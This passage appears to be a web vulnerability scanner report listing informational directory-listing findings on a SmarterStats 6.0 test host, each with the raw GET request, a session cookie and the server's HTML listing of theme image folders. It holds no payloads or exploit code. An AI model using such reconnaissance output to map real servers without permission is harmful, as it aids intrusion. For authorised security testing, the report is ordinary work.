Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="MessageView/">MessageView</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.53. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/DragDrop/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/DragDrop/

Request

GET /App_Themes/Default/images/icons/DragDrop/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:46 GMT
Content-Length: 1509
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/DragDrop/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/DragDrop/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,449 <A href="Failure.png">Failure.png</A>
Thursday, October 07, 2010 01:00 PM 821 <A href="Success.png">Success.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.54. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuInternal/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/IconMenuInternal/

Request

GET /App_Themes/Default/images/icons/IconMenuInternal/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:47 GMT
Content-Length: 1723
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/IconMenuInternal/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/IconMenuInternal/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 4,183 <A href="Hover.png">Hover.png</A>
Thursday, October 07, 2010 01:00 PM 6,540 <A href="Selected.png">Selected.png</A>
Thursday, October 07, 2010 01:00 PM 6,479 <A href="SelectedHover.png">SelectedHover.png</A>
Thursday, October 07, 2010 01:00 PM 3,561 <A href="Unselected.png">Unselected.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.55. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuTrack/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/IconMenuTrack/

Request

GET /App_Themes/Default/images/icons/IconMenuTrack/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:47 GMT
Content-Length: 1717
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/IconMenuTrack/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/IconMenuTrack/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 3,269 <A href="Hover.png">Hover.png</A>
Thursday, October 07, 2010 01:00 PM 5,392 <A href="Selected.png">Selected.png</A>
Thursday, October 07, 2010 01:00 PM 5,546 <A href="SelectedHover.png">SelectedHover.png</A>
Thursday, October 07, 2010 01:00 PM 2,586 <A href="Unselected.png">Unselected.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.56. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/MessageView/

Request

GET /App_Themes/Default/images/icons/MessageView/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:48 GMT
Content-Length: 2628
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/MessageView/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/MessageView/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 669 <A href="chat.gif">chat.gif</A>
Thursday, October 07, 2010 01:00 PM 155 <A href="contract.gif">contract.gif</A>
Thursday, October 07, 2010 01:00 PM 626 <A href="contractAll.gif">contractAll.gif</A>
Thursday, October 07, 2010 01:00 PM 657 <A href="delete.gif">delete.gif</A>
Thursday, October 07, 2010 01:00 PM 578 <A href="edit.gif">edit.gif</A>
Thursday, October 07, 2010 01:00 PM 605 <A href="email.gif">email.gif</A>
Thursday, October 07, 2010 01:00 PM 607 <A href="emailAttch.gif">emailAttch.gif</A>
Thursday, October 07, 2010 01:00 PM 154 <A href="expand.gif">expand.gif</A>
Thursday, October 07, 2010 01:00 PM 622 <A href="expandAll.gif">expandAll.gif</A>
Thursday, October 07, 2010 01:00 PM 6,273 <A href="MessageIcons.png">MessageIcons.png</A>
Thursday, October 07, 2010 01:00 PM 650 <A href="quoteReply.gif">quoteReply.gif</A>
Thursday, October 07, 2010 01:00 PM 686 <A href="rawContent.gif">rawContent.gif</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="rollover/">rollover</A>
Thursday, October 07, 2010 01:00 PM 608 <A href="unlink.gif">unlink.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.57. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/rollover/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/MessageView/rollover/

Request

GET /App_Themes/Default/images/icons/MessageView/rollover/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:48 GMT
Content-Length: 2196
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/MessageView/rollover/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/MessageView/rollover/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/MessageView/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 190 <A href="contract.gif">contract.gif</A>
Thursday, October 07, 2010 01:00 PM 662 <A href="contractAll.gif">contractAll.gif</A>
Thursday, October 07, 2010 01:00 PM 716 <A href="delete.gif">delete.gif</A>
Thursday, October 07, 2010 01:00 PM 635 <A href="edit.gif">edit.gif</A>
Thursday, October 07, 2010 01:00 PM 191 <A href="expand.gif">expand.gif</A>
Thursday, October 07, 2010 01:00 PM 654 <A href="expandAll.gif">expandAll.gif</A>
Thursday, October 07, 2010 01:00 PM 686 <A href="quoteReply.gif">quoteReply.gif</A>
Thursday, October 07, 2010 01:00 PM 718 <A href="rawContent.gif">rawContent.gif</A>
Thursday, October 07, 2010 01:00 PM 654 <A href="unlink.gif">unlink.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.58. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenu/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/iconmenu/

Request

GET /App_Themes/Default/images/icons/iconmenu/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:44 GMT
Content-Length: 1707
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/iconmenu/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/iconmenu/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 4,183 <A href="Hover.png">Hover.png</A>
Thursday, October 07, 2010 01:00 PM 6,540 <A href="Selected.png">Selected.png</A>
Thursday, October 07, 2010 01:00 PM 6,479 <A href="SelectedHover.png">SelectedHover.png</A>
Thursday, October 07, 2010 01:00 PM 3,561 <A href="Unselected.png">Unselected.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.59. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenustats/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/iconmenustats/

Request

GET /App_Themes/Default/images/icons/iconmenustats/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:46 GMT
Content-Length: 1717
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/iconmenustats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/iconmenustats/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 3,138 <A href="Hover.png">Hover.png</A>
Thursday, October 07, 2010 01:00 PM 5,164 <A href="Selected.png">Selected.png</A>
Thursday, October 07, 2010 01:00 PM 5,328 <A href="SelectedHover.png">SelectedHover.png</A>
Thursday, October 07, 2010 01:00 PM 2,439 <A href="Unselected.png">Unselected.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.60. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/misc/

Request

GET /App_Themes/Default/images/misc/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:41 GMT
Content-Length: 7465
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/misc/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/misc/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,616 <A href="attDoc.gif">attDoc.gif</A>
Thursday, October 07, 2010 01:00 PM 1,618 <A href="attFile.gif">attFile.gif</A>
Thursday, October 07, 2010 01:00 PM 1,614 <A href="attPdf.gif">attPdf.gif</A>
Thursday, October 07, 2010 01:00 PM 1,639 <A href="attZip.gif">attZip.gif</A>
Thursday, October 07, 2010 01:00 PM 844 <A href="btnListRemove.gif">btnListRemove.gif</A>
Thursday, October 07, 2010 01:00 PM 836 <A href="checkmark.gif">checkmark.gif</A>
Thursday, October 07, 2010 01:00 PM 610 <A href="clear.png">clear.png</A>
Thursday, October 07, 2010 01:00 PM 1,047 <A href="close.gif">close.gif</A>
Thursday, October 07, 2010 01:00 PM 381 <A href="CloseBtn_Disabled.gif">CloseBtn_Disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 380 <A href="CloseBtn_Enabled.gif">CloseBtn_Enabled.gif</A>
Thursday, October 07, 2010 01:00 PM 689 <A href="cloudy.png">cloudy.png</A>
Thursday, October 07, 2010 01:00 PM 3,982 <A href="DialogToolbarButtonSprites.gif">DialogToolbarButtonSprites.gif</A>
Thursday, October 07, 2010 01:00 PM 834 <A href="Down.gif">Down.gif</A>
Thursday, October 07, 2010 01:00 PM 834 <A href="DownDisabled.gif">DownDisabled.gif</A>
Thursday, October 07, 2010 01:00 PM 1,340 <A href="DownloadAll.gif">DownloadAll.gif</A>
Thursday, October 07, 2010 01:00 PM 484 <A href="filterClearBtn.png">filterClearBtn.png</A>
Thursday, October 07, 2010 01:00 PM 1,308 <A href="filterClearBtnBlue.png">filterClearBtnBlue.png</A>
Thursday, October 07, 2010 01:00 PM 754 <A href="filterGoBtn.png">filterGoBtn.png</A>
Thursday, October 07, 2010 01:00 PM 1,394 <A href="filterGoBtnBlue.png">filterGoBtnBlue.png</A>
Thursday, October 07, 2010 01:00 PM 344 <A href="Forward.gif">Forward.gif</A>
Thursday, October 07, 2010 01:00 PM 517 <A href="Green.gif">Green.gif</A>
Thursday, October 07, 2010 01:00 PM 370 <A href="Green_Checkmark.png">Green_Checkmark.png</A>
Thursday, October 07, 2010 01:00 PM 816 <A href="HorizontalBorderLine.gif">HorizontalBorderLine.gif</A>
Thursday, October 07, 2010 01:00 PM 1,376 <A href="Invitation.png">Invitation.png</A>
Thursday, October 07, 2010 01:00 PM 1,553 <A href="LoadingIndicator.gif">LoadingIndicator.gif</A>
Thursday, October 07, 2010 01:00 PM 375 <A href="Merge.gif">Merge.gif</A>
Thursday, October 07, 2010 01:00 PM 887 <A href="NavLeft.png">NavLeft.png</A>
Thursday, October 07, 2010 01:00 PM 894 <A href="NavRight.png">NavRight.png</A>
Thursday, October 07, 2010 01:00 PM 7,564 <A href="nav_logo4.png">nav_logo4.png</A>
Thursday, October 07, 2010 01:00 PM 380 <A href="Note.gif">Note.gif</A>
Thursday, October 07, 2010 01:00 PM 70 <A href="Paperclip.gif">Paperclip.gif</A>
Thursday, October 07, 2010 01:00 PM 776 <A href="partial_cloudy.png">partial_cloudy.png</A>
Thursday, October 07, 2010 01:00 PM 56 <A href="Priority_High.gif">Priority_High.gif</A>
Thursday, October 07, 2010 01:00 PM 65 <A href="Priority_Low.gif">Priority_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 51 <A href="Priority_Normal.gif">Priority_Normal.gif</A>
Thursday, October 07, 2010 01:00 PM 70 <A href="Priority_Urgent.gif">Priority_Urgent.gif</A>
Thursday, October 07, 2010 01:00 PM 526 <A href="rain.png">rain.png</A>
Thursday, October 07, 2010 01:00 PM 86 <A href="RecurringSM.gif">RecurringSM.gif</A>
Thursday, October 07, 2010 01:00 PM 516 <A href="Red.gif">Red.gif</A>
Thursday, October 07, 2010 01:00 PM 780 <A href="refresh_icon.png">refresh_icon.png</A>
Thursday, October 07, 2010 01:00 PM 535 <A href="RemoveAttch.png">RemoveAttch.png</A>
Thursday, October 07, 2010 01:00 PM 848 <A href="right.gif">right.gif</A>
Thursday, October 07, 2010 01:00 PM 863 <A href="right2.gif">right2.gif</A>
Thursday, October 07, 2010 01:00 PM 66 <A href="SmallPaperclip.gif">SmallPaperclip.gif</A>
Thursday, October 07, 2010 01:00 PM 2,202 <A href="sm_logo.png">sm_logo.png</A>
Thursday, October 07, 2010 01:00 PM 741 <A href="snow.png">snow.png</A>
Thursday, October 07, 2010 01:00 PM 711 <A href="storm.png">storm.png</A>
Thursday, October 07, 2010 01:00 PM 2,243 <A href="st_logo.PNG">st_logo.PNG</A>
Thursday, October 07, 2010 01:00 PM 295 <A href="swfupload-button.png">swfupload-button.png</A>
Thursday, October 07, 2010 01:00 PM 408 <A href="TicketAssigned.gif">TicketAssigned.gif</A>
Thursday, October 07, 2010 01:00 PM 325 <A href="TicketDeleted.gif">TicketDeleted.gif</A>
Thursday, October 07, 2010 01:00 PM 848 <A href="TitleDropDown.gif">TitleDropDown.gif</A>
Thursday, October 07, 2010 01:00 PM 834 <A href="tooltipClose.gif">tooltipClose.gif</A>
Thursday, October 07, 2010 01:00 PM 349 <A href="Transfer.gif">Transfer.gif</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Tree/">Tree</A>
Thursday, October 07, 2010 01:00 PM 833 <A href="Up.gif">Up.gif</A>
Thursday, October 07, 2010 01:00 PM 833 <A href="UpDisabled.gif">UpDisabled.gif</A>
Thursday, October 07, 2010 01:00 PM 484 <A href="UpgradeArrow.png">UpgradeArrow.png</A>
Thursday, October 07, 2010 01:00 PM 890 <A href="UpperRightCheckmarkBG.gif">UpperRightCheckmarkBG.gif</A>
Thursday, October 07, 2010 01:00 PM 836 <A href="whitecheckmark.gif">whitecheckmark.gif</A>
Thursday, October 07, 2010 01:00 PM 236 <A href="Ylw-Star_emp.gif">Ylw-Star_emp.gif</A>
Thursday, October 07, 2010 01:00 PM 573 <A href="Ylw-Star_full.gif">Ylw-Star_full.gif</A>
Thursday, October 07, 2010 01:00 PM 359 <A href="Ylw-Star_half.gif">Ylw-Star_half.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.61. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/tree/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/misc/tree/

Request

GET /App_Themes/Default/images/misc/tree/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:39 GMT
Content-Length: 1989
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/misc/tree/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/misc/tree/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/misc/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 67 <A href="BottomLine.gif">BottomLine.gif</A>
Thursday, October 07, 2010 01:00 PM 1,940 <A href="FirstNodeSpan.gif">FirstNodeSpan.gif</A>
Thursday, October 07, 2010 01:00 PM 71 <A href="MiddleLine.gif">MiddleLine.gif</A>
Thursday, October 07, 2010 01:00 PM 114 <A href="NodeSpan.gif">NodeSpan.gif</A>
Thursday, October 07, 2010 01:00 PM 214 <A href="PlusMinus.gif">PlusMinus.gif</A>
Thursday, October 07, 2010 01:00 PM 844 <A href="SingleLine.gif">SingleLine.gif</A>
Thursday, October 07, 2010 01:00 PM 68 <A href="TopLine.gif">TopLine.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.62. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/skin/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/skin/

Request

GET /App_Themes/Default/images/skin/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:38 GMT
Content-Length: 5435
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/skin/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
